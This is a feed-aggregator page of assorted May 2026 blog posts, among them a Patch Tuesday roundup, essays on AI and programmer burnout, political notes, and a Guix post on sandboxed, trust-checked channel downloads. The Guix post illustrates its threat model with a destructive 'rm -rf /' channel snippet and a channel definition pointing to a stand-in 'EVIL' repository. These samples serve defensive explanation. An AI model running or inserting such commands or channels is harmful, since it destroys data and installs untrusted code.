Wednesday, 13 May

10:28

The airplane oath [Seth's Blog]

You’re flying over Mount Rainier and a hole opens up in the bottom of your airplane. In that moment, you think hard about what you’ve done, what you’re doing, and what matters.

My friend Ty actually had this happen. In that moment, she decided to stop wasting her days on a career that pleased her family, and committed, if she survived, to quit and go build something that mattered to her.

Of course, in the months that followed, honoring the commitment was hard. If it were easy, she would have done it far sooner.

But it’s an oath. The sort of promise you don’t negotiate.

The really cool thing is that you don’t need to avoid a possible plane crash to wake up, see what’s going on in your life and take an oath. You can do it simply because it’s May 13th.

What a chance we each have. To take agency, to make a deal and to honor it. Don’t wait for an excuse to care enough to take an oath. Simply begin.

08:49

The Myriad [Penny Arcade]

New Comic: The Myriad

06:21

Girl Genius for Wednesday, May 13, 2026 [Girl Genius]

The Girl Genius comic for Wednesday, May 13, 2026 has been posted.

Tuesday, 12 May

23:56

Wheat crop failure in US [Richard Stallman's Political Notes]

Global heating has created a wheat crop failure in the US. *Temperature swings have left crops across the Plains in terrible conditions, with some farmers opting not to harvest.*

If we don't curb global heating, this will happen more and more often.

The nocebo effect is real [Richard Stallman's Political Notes]

The nocebo effect is real, just like the placebo effect.

According to one study, the nocebo effect seems to be responsible for around 3/4 of negative reactions to Covid-19 vaccines.

One LLM good at finding exploits in software [Richard Stallman's Political Notes]

Reportedly one LLM is very good at finding exploits in software. People will need to fix them.

Another future LLM may be very good at finding exploits in tax systems. People will need to fix them, too.

UK nationalizing train operating companies [Richard Stallman's Political Notes]

The UK is really nationalizing the train operating companies, reversing one disastrous ideological decision made by the Tories decades ago.

Iranian human rights activist memoir [Richard Stallman's Political Notes]

Narges Mohammadi, Iranian human rights activist, wrote a memoir which describes beatings, solitary confinement, and denial of medical treatment. She is dying in prison, and those cruel state actions are part of the cause.

I wonder why the US persecutor hates the Iranian persecutors so much, given that he seems to be just fine with Russia's persecutor. He surely does not care any more about Iranians' human rights than about Americans' human rights. Perhaps this reflects Netanyahu's influence on him; perhaps he hates Iran's rulers because they persistently organize Shi'ites to oppose Israel on behalf of Palestinians.

Pardoned January 6 rioter sentenced for burglary [Richard Stallman's Political Notes]

*Pardoned January 6 rioter sentenced to seven years for Virginia burglary.*

The bullshitter launched the mob at the Capitol after preparing them with violent hatred, and arranged to make armed support hard for the Capitol police to obtain. In 2025, he pardoned all those who had been convicted for participating in the attack. There is no reasonable doubt that he arranged the attack intentionally and considers it an act of support for him. Justice calls for him to be convicted of the attack and sentenced to prison.

Datacenter planning documents mislead on greenhouse gas emissions [Richard Stallman's Political Notes]

Google datacenter planning documents misleadingly minimized the projected greenhouse gas emissions by a factor of five.

23:42

Link [Scripting News]

I have regained control of my Twitter account. I really missed it, truth be told. Thanks to Scoble for helping here. As he so often has.

23:35

Patch Tuesday, May 2026 Edition [Krebs on Security]

Artificial intelligence platforms may be just as susceptible to social engineering as human beings, but they are proving remarkably good at finding security vulnerabilities in human-made computer code. That reality is on full display this month with some of the more widely-used software makers — including Apple, Google, Microsoft, Mozilla and Oracle — fixing near-record volumes of security bugs, and/or quickening the tempo of their patch releases.

As it does on the second Tuesday of every month, Microsoft today released software updates to address at least 118 security vulnerabilities in its various Windows operating systems and other products. Remarkably, this is the first Patch Tuesday in nearly two years in which Microsoft is not shipping any fixes for emergency zero-day flaws that are already being exploited. Nor have any of the flaws fixed today been previously disclosed (potentially giving attackers a heads-up on how to exploit the weakness).

Sixteen of the vulnerabilities earned Microsoft’s most-dire “critical” label, meaning malware or miscreants could abuse these bugs to seize remote control over a vulnerable Windows device with little or no help from the user. Rapid7 has done much of the heavy lifting in identifying some of the more concerning critical weaknesses this month, including:

  • CVE-2026-41089: A critical stack-based buffer overflow in Windows Netlogon that offers an attacker SYSTEM privileges on the domain controller. No privileges or user interaction are required, and attack complexity is low. Patches are available for all versions of Windows Server from 2012 onwards.
  • CVE-2026-41096: A critical RCE in the Windows DNS client implementation worthy of attention despite Microsoft assessing exploitation as less likely.
  • CVE-2026-41103: A critical elevation of privilege vulnerability that allows an unauthorized attacker to impersonate an existing user by presenting forged credentials, thus bypassing Entra ID. Microsoft expects that exploitation is more likely.

May’s Patch Tuesday is a welcome respite from April, which saw Microsoft fix a near-record 167 security flaws. Microsoft was among a few dozen tech giants given access to “Project Glasswing,” a much-hyped AI capability developed by Anthropic that appears quite effective at unearthing security vulnerabilities in code.

Apple, another early participant in Project Glasswing, typically fixes an average of 20 vulnerabilities each time it ships a security update for iOS devices, said Chris Goettl, vice president of product management at Ivanti. On May 11, Apple shipped iOS 15, which addressed at least 52 vulnerabilities and backported the changes all the way to iPhone 6s and iOS 15.

Last month, Mozilla released Firefox 150, which resolved a whopping 271 vulnerabilities that were reportedly discovered during the Glasswing evaluation.

“Since Firefox 150.0.0 released, they have been on a more aggressive weekly cadence for security updates including the release of Firefox 150.0.3 on May Patch Tuesday resolving between three to five CVEs in each release,” Goettl said.

The software giant Oracle likewise recently increased its patch pace in response to their work with Glasswing. In its most recent quarterly patch update, Oracle addressed at least 450 flaws, including more than 300 fixes for remotely exploitable, unauthenticated flaws. But at the end of April, Oracle announced it was switching to a monthly update cycle for critical security issues.

On May 8, Google started rolling out updates to its Chrome browser that fixed an astonishing 127 security flaws (up from just 30 the previous month). Chrome automagically downloads available security updates, but installing them requires fully restarting the browser.

If you encounter any weirdness applying the updates from Microsoft or any other vendor mentioned here, feel free to sound off in the comments below. Meantime, if you haven’t backed up your data and/or drive lately, doing that before updating is generally sound advice. For a more granular look at the Microsoft updates released today, check out this inventory by the SANS Internet Storm Center.

23:00

Link [Scripting News]

This bit of code kept coming up, so I wanted to make it easier to find.

22:14

The anti-minimalist backlash is the bigger story behind Oxygen’s revival [OSnews]

A few weeks ago, we talked about a project within KDE to revive two of their classic themes, Oxygen and Air, and polish them up to make them usable on the current versions of KDE. The developers and designers working on this project say they’ve been utterly surprised by just how popular this news has proven to be, and Filip Fila published a blog post with some thoughts on this unexpected popularity. Why are people yearning so strongly for user interfaces from the past?

That’s the real story underneath the retro-yearning. It isn’t simply a story of people wanting their childhood from the 2000s back. It’s that a lot of ‘the new’ we’ve been offering doesn’t satisfy. It doesn’t have personality. It doesn’t feel warm. It doesn’t feel like it was made with the idea of being anything more than a clean product that gets the job done. The escapism towards the past is a symptom. A symptom of unmet needs, not mere sentimentality.

↫ Filip Fila

Fila uses modern architecture as an example, and I think it’s an apt one. While monumental modern architecture can easily be beautiful and striking, it’s the mundane buildings all around us that just don’t seem to elicit any positive emotions, no sense of belonging or safety. As Fila also notes, the decades-long swing to minimalism in both architecture and UI design isn’t merely because of a preference among designers, but also because minimalism is a hell of a lot cheaper to produce. A building with very little ornamentation and basic, straight lines is much easier, and thus cheaper, to design, construct, and maintain. The same applies to graphical user interface design.

There are some signs that the pendulum is starting to swing back towards more instead of less, in all aspects of design. More and more people are loudly demanding buildings to adopt more classical elements, and as we can all attest to here on OSNews, the longing for aspects of UI design from the ’90s and early 2000s to make a return is strong. And not just among us deep in the weeds, either; I’ve lost count of the number of times I’ve seen normal people utterly confounded by modern UI design.

Anyway, bring back beveled edges.

21:28

05/12/26 [Flipside]

1 week left in my Kickstarter! Still trying to raise as much as I can for the next volume of my graphic novel! You can order any of the books!

https://www.kickstarter.com/projects/1016357068/flipside-graphic-novel-13th-volume

Google gives early peek at Android laptops: Googlebooks [OSnews]

The news that Google is working to move Chrome OS to the Android technology stack, and that it wants to start putting Android on laptops, is not exactly news, as the company has been talking about it for years. At an Android event today, the company finally unveiled the culmination of all this work: Googlebooks.

We’re bringing together the best of Android, which comes with powerful apps on Google Play and a modern OS that’s designed for Intelligence, and ChromeOS, which comes with the world’s most popular browser. The result is Googlebook: a new category of laptops built with Gemini’s helpfulness at its core, designed to work seamlessly with the devices in your life and powered by premium hardware. We’re sharing a sneak peek into the Googlebook experience today and will have a lot more to share later this year.

↫ Alex Kuscher at The Keyword, a Google blog apparently

The approach here seems very similar to Chromebooks, with Googlebooks being designed and built by various OEMs, but instead of Chrome OS they run Android in desktop mode. Of course, “AI” has been creamed all over these things, to the point where not even the venerable mouse cursor is safe: if you wiggle your cursor, it will turn into “Magic Pointer”, which will highlight various “AI” actions as you hover over stuff on your screen. Google also showed off an “AI”-based feature to create widgets, as well as the ability to access files on your phone right from a Googlebook.

That’s about all we know as far as functionality and features go. They’re supposed to go on sale later this year, with models coming from Acer, ASUS, Dell, HP, and Lenovo.

21:21

I Didn’t Even Know American Wisteria Was A Thing [Whatever]

Spring is in full swing here in Ohio and it has been both very beautiful and very allergy-inducing. One of the more beautiful aspects is that there is apparently a ton of American Wisteria wrapped around my pergola by the garage, and I find it to be extremely pretty. See for yourself:

A beautiful blossom of the American Wisteria, purple and clustered together into almost hydrangea like shapes.

This particular bloom is more open and blossomed than the others, hence why I took its photo. Before they bloomed, they all looked like tiny purple pinecones. I had no idea that they would open up into these beautiful flower clusters. I’m absolutely thrilled these are wrapped completely around my pergola. I notice their beauty every time I leave my house.

Very grateful to have some pretty purple flowers around.

Have you seen American Wisteria before? Perhaps you’ve seen the wisteria in Japan before? Let me know in the comments, and have a great day!

-AMS


19:07

[$] Using dma-bufs for read and write operations [LWN.net]

The kernel's dma-buf subsystem provides a way for drivers to share memory buffers, usually in order to support efficient device-to-device I/O. At the 2026 Linux Storage, Filesystem, Memory Management, and BPF Summit, Pavel Begunkov, assisted by Kanchan Joshi, led a joint session of the storage and memory-management tracks to explore ways to make the use of dma-bufs more efficient yet, and to make them available for read and write operations initiated by user space.

17:35

Link [Scripting News]

Expanding items on a FeedLand blogroll should be consistently fast now. Just switched to a different server on the backend.

Burnout and Cognitive Debt [Radar]

Steve Yegge’s article about programmer burnout (“The AI Vampire”) along with Margaret Storey’s article about Cognitive Debt started an ongoing conversation about programmer fatigue and software quality—two topics that should be linked, but often aren’t. Steve argues that programming constantly with the help of agentic AI leads to burnout; it’s fast, it’s fun, but keeping up with your agents causes mental strain. He recommends programming with agents no more than 4 or 5 hours per day. I could cynically say that most software developers spend at most 20% of their time writing code, which leaves about an hour and a half for wrestling with agents—but that’s beside the point. Yegge’s point about burnout is important, and is in line with what friends have told me. At some point, you have to put the laptop down.

Storey makes a different point. Agentic engineering is great at creating software that works, but that you don’t quite understand. Like humans, agents can generate a lot of spaghetti code. They can “design” convoluted and inappropriate software structures—I hesitate to call them “architectures”; they’re what happens in the absence of architecture. Agents are very capable of creating technical debt—and not the kind of meaningful technical debt that lets you release a product on time with the knowledge that you need to pay it back with interest. If nobody is looking hard at the code, the debt can grow without bounds, sort of like not checking your credit card balance. What’s worse—and this is Storey’s contribution—while that technical debt is growing, developers are losing track of the design, the structure, the architecture. She calls that “cognitive debt.” You don’t just have problems in the code; those problems are harder to find and fix than they should be because you’re unclear on the structure of the code you’re working with.

Other voices have made similar points. The Sonarsource blog writes about how AI is reshaping technical debt and creating new burdens, new kinds of toil. In “The Mythical Agent Month,” Wes McKinney links the problem of burnout to the introduction of “accidental complexity” and “agent scope creep,” while Tim O’Brien writes that while scope creep isn’t new, AI supersized its growth. And Addy Osmani writes about finding your parallel agent limit, coming to grips with what you’re capable of accomplishing without compromising your work or your life.

Cognitive debt and burnout aren’t new, alas. With or without AI, we’ve all stayed up until 4AM working on a bug that won’t go away or pursuing an interesting idea to its end. Sometimes that’s heroic, but AI threatens to turn it into a lifestyle. AI fatigue is real, as Siddhant Khare writes, and it’s something we need to talk about. When fatigued, it’s tempting to say “this works, it looks good, and it passes our tests” without considering how the code fits into the overall plan. With 10x code generation, you also get 10x the debt load, and that’s being optimistic. When the debt curve goes exponential, strategies for managing that debt are stressed past the breaking point.

The problem with cognitive debt is that it eventually makes new features and bug fixes difficult or impossible. The code has become so convoluted that it can’t be changed. I’ve certainly done that with hand-written code: added a feature without thinking enough about how the new code fit in, added some more code later, and then—when I needed to add a third feature—discovered that I’d created a problem that wouldn’t be simple to fix. The right stuff was there, but in the wrong places because I wasn’t thinking about the overall structure.

That’s a common enough problem with handwritten code; it’s almost always a problem with legacy code where the original developers and maintainers are no longer around. We need to realize that it’s also a problem with AI-generated code, which has been characterized as legacy code from the day it’s written. Somebody or something has to pay down the debt. As Storey writes, “velocity without understanding is not sustainable”: not for humans, not for machines. If you understand the structure of what you’re building, you can steer the AI away from creating a problem in the first place, or you can use it to author a fix. If you don’t understand the structure or can’t describe it to the AI, you’re lost.

Cognitive debt accumulates much more quickly when you’re burned out. Burnout has always been a problem for programmers, especially for those who really love programming: you stay up all night to solve a problem. And, while some programmers resist using AI to write code, those who use AI frequently find that it exacts the same toll: it’s hard to stop. It is its own kind of toil: toil that gives you a sense of accomplishment and fulfillment, but still leaves you empty.

Agents may not be subject to burnout, but the humans who control them are. Agents are quickly becoming more capable, but they still can’t maintain a sense of the shape and structure of a project over the long term. That’s our job. They can pay down technical debt, but only if properly guided; that’s also our job. And we won’t be able to do either if we’re burned out.

16:56

The Big Idea: Ada Hoffman [Whatever]

When it comes down to it, all humanity really has at the end of the day is our stories. Telling stories around the fire is a practice as old as humanity itself, and author Ada Hoffman expresses the importance of these stories, and the importance of being human, in the Big Idea for their newest novel, Ignore All Previous Instructions.

ADA HOFFMAN:

When I tell people the premise of Ignore All Previous Instructions, they often remark how it reminds them of real life these days. In Ignore, the characters live in a space colony on Callisto where a generative AI company owns everything – and where making art or telling stories, without the AI’s assistance, is strictly not allowed.

Certainly there are parallels between this dystopian premise and my life in 2026 – working as an adjunct for a university computer science department where the people in charge keep yelling about the “pivot to AI” and how terrible it will be if we don’t all get on board.

But I wrote Ignore in 2023.

Publishing is slow, and novelists write about current events at our own peril. In 2023, I could see which way the tech industry hype train was going, but there was no way to know if it would still be going that direction three years later. I hoped it wouldn’t be. I decided to write the story anyway and see how it landed, because the topic was so close to my professional expertise and so close to my heart.

Another part of the novel, even closer to my heart and equally timely, was the problem of queer self-expression and book bans.

In 2023, I was at an early stage in therapy. I was just starting to think back, in ways I hadn’t allowed myself before, about how some of my experiences growing up had shaped me. This included a lot of things, many of them not germane to this post, but it also included the experience of growing up queer without understanding that that’s what it was.

My gut told me that I needed to write about these experiences – more urgently than I had ever needed to write about anything before.

In 2023, we were already seeing book bans and “Don’t Say Gay” laws. I didn’t know if that trend was going to continue for three years, either. I hoped it wouldn’t. But I couldn’t help but look at that news and think of my own childhood. I eventually did find words and concepts for what I was experiencing, although not necessarily in the healthiest way. The generation after me was given so much more, in terms of words and ways of understanding themselves. It galled me to see reactionaries trying to take that away from them again.

When I put these two urgently emerging problems together, I could see that they had one big thing in common. They were both, at heart, about the deep human need to express one’s own feelings – and a powerful movement that threatened to take it away.

AI writing is not an expression of the genuine heartfelt thought or experience of a human. If it is carefully prompted to express a human’s heartfelt thought, then the thought comes from the human, not the AI. Research shows that, the longer we use a generative AI, the less our own thoughts enter into it; instead, offloading our thinking onto an AI causes our own capacity for independent thought to atrophy. Given the fervor and urgency with which tech companies urge us to use AI for everything, one might be forgiven for suspecting that this atrophy is their goal.

Moreover, because it’s trained to predict the most likely continuation of a set of words, AI writing will always converge toward the most mainstream or most common way of looking at something. The mainstream of the training data – essentially, the whole Internet, plus all the published books that the tech companies could find – is not queer. Even without any deliberate censorship, the perspectives of queer people and other minoritized groups are less likely to be considered in an AI’s output. For the same reason, if the AI is deliberately prompted to represent a queer perspective, it will rely on broad averages and stereotypes – not the lived and felt experience of an individual human who is queer.

But in hard times like these, independent thought based on our own lived experience is exactly what we need. This is the skill that helps us to understand when something is not quite right, or doesn’t quite match the truth of our lives – whether it’s a structural injustice or something personal.

Ignore All Previous Instructions tells the story of characters who grow up caught in a system where their own thoughts and voices are not valued, and who find ways – determinedly and imperfectly – to tell their own stories regardless. If there’s one idea readers take away from the book, I hope it’s the beauty and power of storytelling in our own words – and the need to hold on to it in the face of an establishment which would rather our stories weren’t told.


Ignore All Previous Instructions: Amazon|Barnes & Noble|Bookshop

Author socials: Website|Bluesky|Facebook

Read an excerpt.

16:00

Link [Scripting News]

Masto, Twitter: I'd like to come up with a list of formats, protocols and products that have become defaults for AI work.

14:35

Time travel without borders [Planet GNU]

When offered the option to run other people’s code, a prime consideration is often ease of deployment. While much progress has been made in support of rapid deployment, the security implications of those quick deployments are often overlooked. In this post, we look at a new feature of guix time-machine and guix pull in support of one-line deployment commands: the ability to download channel files, but without compromising on security.

Sharing code

The normal workflow to share software and make it easily deployable with Guix goes like this: someone puts their packager hat on and writes a package definition, adds it to Guix proper or to a separate channel, at which point anyone can fetch the relevant channel(s) and deploy the software.

As an example, let’s assume you want to run yt-dlp as packaged in the latest Guix revision without upgrading your system or going through an explicit installation step. The simplest way to do that is with this command:

guix time-machine -q -- shell yt-dlp -- yt-dlp …

If you’re familiar with Nix, this is equivalent—with some important differences we’ll discuss below—to this command:

nix shell nixpkgs#yt-dlp --command yt-dlp …

In both cases, we’re fetching the latest revision of the package collection (the master branch for Guix, the nixpkgs-unstable branch of Nixpkgs for Nix) and running yt-dlp from there. (nix run goes one step further by removing the need to specify the command name.)

Now, that was an easy example because yt-dlp comes from Guix itself. What if you’d like to deploy an application that’s in another channel such as Guix-Science? Well, you would first need to come up with a channels.scm file for Guix-Science and then you can pass it to guix pull or guix time-machine:

$EDITOR channels.scm
# Make sure that includes Guix-Science.
guix time-machine -C channels.scm -- shell …

If you’re lucky, perhaps you can download a channel file. For example, Cuirass produces them for all successfully-evaluated commits, so you can fetch one for Guix-Science and go from there:

wget -O channels.scm \
  https://guix.bordeaux.inria.fr/eval/latest/channels.scm?spec=guix-science
guix time-machine -C channels.scm -- shell …

You can even do it in a single command using Bash process substitution!

guix time-machine \
  -C <(wget -O - https://guix.bordeaux.inria.fr/eval/latest/channels.scm?spec=guix-science) \
  -- shell …

Is it a good idea though?

The threat

If you look more closely, the nix shell command and the last two guix time-machine commands have a bit of a curl | sh flavor to them: downloading arbitrary code and running it without further ado. All nix shell does is authenticate github.com, through HTTPS, and likewise for wget—that you’re downloading from the genuine github.com doesn’t tell you anything about the trustworthiness of the code you’re running.

In the case of Guix, the channels.scm you’re downloading could very well read this:

(system* "rm" "-rf" "/")  ;uh-oh!

Here system*, as you might have guessed, invokes a command. Because yes, channel files can contain arbitrary Scheme code! (It’s worth noting that this particular problem is one Nix doesn’t have: Nix being a domain-specific language (DSL) already limits what Nix code can do, especially with so-called “pure” evaluation.)

Or it could read something like this:

(list (channel
        (name 'guix)
        ;; This is Mallory’s malicious Guix, now you’re PWND!
        (url "https://example.org/EVIL/guix.git")
        (branch "master")
        (introduction
         (make-channel-introduction
          "badc0ffeed807b096b48283debdcddccfea34bad"
          (openpgp-fingerprint
           "DEAD CABB A99E F6A8 0D1D  E643 A2A0 6DF2 A33A BADD")))))

In this case, the channel file looks good, but the channel you’ll fetch—probably not so much.

So no: downloading a channel file and using it without checking it is not reasonable.

The cake

Can we have our cake and eat it too? Can we casually download someone else’s channel file without putting our system at risk?

Changes that have just landed in guix pull and guix time-machine aim to address these seemingly contradictory needs. The two commands are now equipped to download by themselves: just pass them a URL with the -C (or --channels) option.

guix time-machine \
  -C https://ci.guix.gnu.org/eval/latest/channels.scm?spec=master \
  -- …

Crucially, this command is not equivalent to the naïve -C <(wget -O …) trick we saw above.

First, channel code is now evaluated in a “sandbox”: it can only access a predefined set of bindings, cannot import additional modules, and it must run in a limited amount of time and with a limited amount of memory allocated. This still provides access to many general-purpose facilities but blocks anything that could be used to alter the system state, exfiltrate data, or cause a denial of service.

With this in place, evaluating a channel file can be considered safe. Now, one problem remains: the file might list channels that I as a user do not trust. And here we see a tension between fetching channel files from out there and keeping one’s system safe. To address that, we define a new rule: only trusted channels may be deployed; if a channel file lists untrusted channels, guix pull and guix time-machine error out. Trusted channels are defined as follows:

  • they are those listed in ~/.config/guix/trusted-channels.scm, if it exists—this file lists channels just like a regular channel file;
  • or, they are the channels currently in use, as returned by guix describe.
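
Concretely, ~/.config/guix/trusted-channels.scm uses the same syntax as a regular channels file. Here is a minimal sketch that trusts a single channel, reusing the Guix-Past specification from this post—any channel you actually trust would do:

```scheme
;; ~/.config/guix/trusted-channels.scm
;; Same format as a regular channels file: a list of <channel> records.
(list (channel
        (name 'guix-past)
        (url "https://codeberg.org/guix-science/guix-past")
        (introduction
         (make-channel-introduction
          "0c119db2ea86a389769f4d2b9c6f5c41c027e336"
          (openpgp-fingerprint
           "3CE4 6455 8A84 FDC6 9DB4  0CFB 090B 1199 3D9A EBB5")))))
```

With this file in place, a downloaded channel file listing this channel—under whatever name—would be accepted; a channel file listing anything else would make guix pull and guix time-machine error out.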

This brings us to the interesting question of channel identity. The channel I call guix-science in my trusted-channels.scm, someone else might well call Guix-Science or science; how can I tell if we’re dealing with the channel that I call guix-science and that I trust?

The key insight is that the name itself doesn’t matter; the element that does matter is the “introduction” of the channel—the piece of information that tells how to authenticate updates of that channel. If you forgot that episode, the introduction is the thing with hexadecimal strings that appears in a channel specification:

(channel
  (name 'guix-past)
  (url "https://codeberg.org/guix-science/guix-past")
  (introduction   ;this hex soup 👇 is the channel’s identity
   (make-channel-introduction
    "0c119db2ea86a389769f4d2b9c6f5c41c027e336"
    (openpgp-fingerprint
     "3CE4 6455 8A84 FDC6 9DB4  0CFB 090B 1199 3D9A EBB5"))))

Two channels with the same introduction are one and the same. Thus, if my trusted-channels.scm contains a channel with the above introduction, pull and time-machine will happily pull from it.

The corollary is that a channel that cannot be authenticated—i.e., that lacks the introduction field—cannot be considered a trusted channel.

Overall, this “trusted channel” rule trades flexibility for safety. It’s a tradeoff but one that looks like a better default than anything that effectively amounts to arbitrary code execution à la curl | sh.

The party

“Why would I want to download channel files?”, you may ask. Here’s a list of typical use cases we have in mind.

The first one is downloading a channel file from a continuous integration system—to deploy from a known-good state, to test a new package version or a new feature, to reproduce a bug, etc. Cuirass serves channel files for every channel set it evaluates. So for example, you can pull the latest Guix channel that was successfully evaluated like this:

guix pull -C https://ci.guix.gnu.org/eval/latest/channels.scm?spec=master

Likewise, this is how you’d travel to the latest Guix-Science channel and dependent channels to execute RStudio:

guix time-machine \
  -C https://guix.bordeaux.inria.fr/eval/latest/channels.scm?spec=guix-science \
  -- shell rstudio -- rstudio

A second, similar use case is one-line commands for demos: if you’re developing an application, you can package it, publish a channel file, and share a time-machine command to spawn it. With pinned channels, you can ensure users run it from a known-good state.

A third use case that is emerging is channel releases. Teams maintaining third-party channels might want to tag releases of their channel as channel files in which each channel is pinned. This is what the Guix-Science project recently decided to do.

In the same vein, a fourth use case is the publication of a tested channel file that a whole team, or a whole fleet of computers, would upgrade from. Imagine a group of people responsible for testing who would periodically publish a new channel file pinned to known-good commits that all the team members or an entire fleet could safely pull from—it could even be used for unattended upgrades!

The fifth use case is reproducible research. A computational workflow can be captured by two files: channels.scm and manifest.scm. In some cases, we might as well download the channel file.
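Putting those two files together, re-running such a workflow is a single command. This is standard guix usage rather than anything specific to this post, and run-analysis.sh is a hypothetical stand-in for whatever entry point the workflow has:

```
guix time-machine -C channels.scm -- \
  shell -m manifest.scm -- ./run-analysis.sh
```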

Dissonance?

But wait… the astute reader might have felt some dissonance: downloading a channel file to set up a supposedly reproducible workflow? That can’t be right: the channel file could change over time, or it could vanish from its original URL. That’s not reproducibility, is it?

As Simon Tournier was quick to suggest, the solution is to support SWHIDs (Software Hash Identifiers) in addition to URLs. A SWHID is essentially a standardized content hash that uniquely identifies “content”—raw data or structured data such as directories and version-control revisions. If you followed along, you might remember that Guix is connected to the Software Heritage archive. Software packaged in Guix is in the archive, and so all we had to do was connect the dots.

Consider this command:

guix time-machine \
  -C swh:1:cnt:003e1e0c1b9b358082201332c926ae54e9549002  \
  -- …

It downloads the channel file identified by the given SWHID and then proceeds.

The SWHID serves as an unambiguous and unique content address to refer to a specific channel set. It can be computed using guix hash, but of course, the channel file must first be present in the Software Heritage archive. Thus, if the file is part of a version-control repository, you can first request archiving of that repository. In a research paper, one may include a single command to re-run computations the paper builds upon.
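A useful detail here: a “cnt” SWHID is defined as the SHA-1 of the file hashed the way Git hashes blobs (a "blob <size>\0" header followed by the contents), so you can also compute it by hand with standard tools—a sketch, assuming sha1sum is available:

```shell
# Compute the swh:1:cnt: identifier of a channel file by hand.
# A content SWHID is the SHA-1 of "blob <size>\0<contents>",
# exactly what `git hash-object` would produce.
file=channels.scm
size=$(wc -c < "$file")
hash=$(printf 'blob %d\0' "$size" | cat - "$file" | sha1sum | cut -d ' ' -f 1)
echo "swh:1:cnt:$hash"
```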

Pleasurable

This new addition felt pleasurable for several reasons. First because it addresses use cases that people had been talking about for a while, and it’s always nice to fill gaps. It also felt good because several design choices complement each other so that everything falls into place: channel specifications, Guile’s “sandboxing”, channel authentication, and Software Heritage integration.

The whole endeavor—allowing for quick deployment without compromising on security—might sound quixotic or, some might say, anachronistic, at a time when the pips, the npms, the snaps and many more are all about deploying software of unknown origin like there’s no tomorrow. In Guix we do believe that transparency, provenance tracking, and verifiability matter for the software we run; efforts like this one are guided by these principles.

The feature landed just a few days ago. Give it a try and let’s hope you find it pleasant as well!

Acknowledgments

I am grateful to Caleb “Reepca” Ristvedt for their thorough code review and insightful suggestions, and to Simon Tournier for commenting on the general approach and suggesting improvements. Many thanks to Rutherther and to Cayetano Santos for reviewing an earlier draft of this post.

[$] Scaling transparent huge pages to 1GB [LWN.net]

As a general rule, when developers talk about huge pages, they are referring to PMD-level pages that are typically 2MB or 4MB in size, depending on the CPU architecture. Most CPUs can support other huge-page sizes, though. On x86 systems, PUD-level huge pages hold 1GB of data. Providing such large pages transparently to processes has generally not been considered either feasible or desirable, but Usama Arif is trying to change that assessment. At the 2026 Linux Storage, Filesystem, Memory Management, and BPF Summit, he led a session in the memory-management track on how to make transparent huge pages (THPs) truly huge.

Security updates for Tuesday [LWN.net]

Security updates have been issued by AlmaLinux (freerdp, glib2, libsoup3, and openexr), Debian (dnsmasq, p7zip, p7zip-rar, python-authlib, and rails), Fedora (chromium, firefox, httpd, and nss), SUSE (java-25-openj9, krb5, libmodsecurity3, and mcphost), and Ubuntu (imagemagick, linux, linux-aws, linux-aws-fips, linux-aws-hwe, linux-azure-4.15, linux-fips, linux-gcp, linux-gcp-4.15, linux-gcp-fips, linux-hwe, linux-kvm, linux-oracle, linux-azure, linux-azure-fips, linux-oracle, linux-azure-5.15, linux-nvidia, linux-nvidia-6.8, linux-nvidia-lowlatency, and linux-raspi).

14:28

Link [Scripting News]

Yesterday I learned about JSONL, and was of course intrigued. It's a really simple thing, even simpler than RSS, and does basically the same thing. And even better, it's the way the AI industry hooks streams together. So if we can get RSS to serve as a source of JSONL feeds, it's possible that the AI industry will find it useful. My goal is to get every standard of the web hooked up to AI, quickly, before the silos realize they're leaving out something important. Once they figure it out, they'll have no choice but to add real RSS support. So I put together a quick demo app that hooks into FeedLand and posts to a JSONL feed new items from one of a small set of feeds I chose basically at random. And here is the JSONL feed. If you're a developer in AI-land, could you try reading this into your JSONL-ingesting app and let me know if I got it right? Here's a place to comment. BTW, that URL is temporary, just for this quick demo.
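For readers who haven't run into it: a JSONL (JSON Lines) feed is nothing more than one complete JSON object per line of a plain text file, which makes it trivial to append to and to stream. A minimal sketch, with made-up item fields:

```shell
# A JSONL feed is one JSON object per line—no surrounding array,
# so producers can append and consumers can read line by line.
printf '%s\n' \
  '{"title": "First item", "link": "https://example.com/1"}' \
  '{"title": "Second item", "link": "https://example.com/2"}' \
  >> feed.jsonl
wc -l < feed.jsonl   # one line per item
```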

Link [Scripting News]

Good morning sports fans!

1343: Gotta Bounce [Order of the Stick]

http://www.giantitp.com/comics/oots1343.html

13:49

Representative Line: Underscore Its Unimportance [The Daily WTF]

Frequent submitter Argle (previously), sends us a short little representative line. The good news is that this line of code came across Argle's screen during a code review: it was being removed. The bad news is that it was sitting in the code base for ages.

_ = len / 8.0f;

Argle writes:

In a code review today. A co-worker wisely removed the line. Dunno the logic that made anyone write it in the first place.

This is C#, though it could be basically any language. Using _ is one of those little conventions that we use to tell the linter to ignore the fact that this variable isn't used. And this variable was not being used. Of course, in addition to being unused, it's also a puzzle: where does the 8.0f come from? No one knows. Why would we even want the length divided by eight? No one knows. There's nothing about this code that gives any indication that it was a meaningful operation at any point.

No one knows what it does, or why it was there in the first place, but someone put the time into making sure the linter didn't complain about its uselessness by using _ as the variable.


12:56

Gyms for Them, Mirrors for Us [Radar]

Personal AI doesn’t have to run your life to change it. It just has to see you clearly and feed your behavior back to you in a way you can’t dodge. Once you look at AI as feedback loops instead of little butlers, the whole “agent” conversation starts to feel upside down.

We’ve overrotated on agents that act and massively underinvested in systems that watch, interpret, and train, for humans and for models.

Stop shipping little butlers

Most personal AI demos orbit the same fantasy: inbox‑zero sidekicks, calendar‑tuning bots, or agents that “just handle it” so you can “focus on what matters.” They’re great on stage but terrible as a risk posture.

The butler model hides a simple asymmetry. A read‑only system that misinterprets you is mildly annoying; you ignore a bad suggestion. A write‑enabled system that misfires in your inbox or CRM is career-limiting. One error is a shrug, the other is an incident report.

That’s the asymmetric agent in one line: Read is cheap; write is expensive. Read can be broad, but write should be narrow, rare, and very hard‑earned. The first, highest‑leverage thing you can build is a mirror: an AI that reads your digital exhaust, synthesizes what it sees, and reflects it back, without ever touching the systems that move money, time, or relationships. Šimon Podhajský’s talk, “Cognitive Exhaust Fumes, or: Read‑Only AI Is Underrated,” is a great example of this pattern in the wild.

This isn’t a temporary sandbox before “real agents.” Treating read‑only as a stepping stone and write as the prize is how you hand a chainsaw to a toddler because they’ve proven they can hold a spoon.

Cognitive exhaust is the real dataset

Your day produces a ridiculous amount of cognitive exhaust: emails half‑written, tabs abandoned, tasks snoozed, articles skimmed, and notes forgotten. Any one stream is noisy. The value appears when you correlate across all of them.

A serious personal AI can sit over multiple sources—mail, calendar, notes, browser history, docs, and CRM—and build a cross‑cutting view of what you do versus what you say you care about. You want it a bit judgmental. You want it to surface things like:

  • Intention–action gaps: projects you “prioritize” but never touch
